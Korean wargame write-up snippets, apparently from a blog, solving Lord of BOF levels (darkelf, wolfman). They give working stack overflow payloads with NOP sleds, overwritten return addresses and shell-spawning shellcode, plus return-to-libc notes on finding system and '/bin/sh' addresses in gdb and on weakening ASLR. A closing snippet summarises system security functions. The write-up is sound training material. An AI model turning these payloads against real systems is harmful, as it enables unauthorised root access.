소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다. 일단 앞과 똑같이 진행하고 payload를 작성때 ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"')

다시 문제를 풀면 두둥 전 문제랑 똑같은 패턴이다. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(주소값)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

gdb안에서의 blocking 함수 입력 r

buf[248] + sfp[4] + ret ulimit -s unlimited //스택크기를 무한정으로 늘려 ASLR이 적용안됨 system,execve - ebp+8위치에있는것을 인자로받음 buf[248] + sfp [4] + 조작(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system주소 구하기 p exit - exit구하기 find &system,+9999999,"/bin/sh" - /bin/sh주소 구하기 ./filename $(python -c 'print "A"*버퍼+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp..

시스템과 관련한 보안 기능 계정과 패스워드 관리 적절한 권한을 가진 사용자를 식별하기 위한 가장 기본적인 인증 수단 시스템에서는 계정과 패스워드 관리가 보안의 시작 세션 관리 사용자와 시스템 또는 두 시스템 간의 활성화된 접속에 대한 관리 일정 시간이 지날 경우 적절히 세션을 종료하고, 비 인가자에 의한 세션 가로채기를 통제 접근 제어 시스템이 네트워크 안에서 다른 시스템으로부터 적절히 보호될 수 있도록 네트워크 관점에서 접근을 통제 권한 관리 시스템의 각 사용자가 적절한 권한으로 적절한 정보 자산에 접근할 수 있도록 통제 로그 관리 시스템 내부 혹은 네트워크를 통한 외부에서 시스템에 어떤 영향을 미칠 경우 해당 사항을 기록 취약점 관리 시스템은 계정과 패스워드 관리, 세션 관리, 접근 제어, 권한 관리..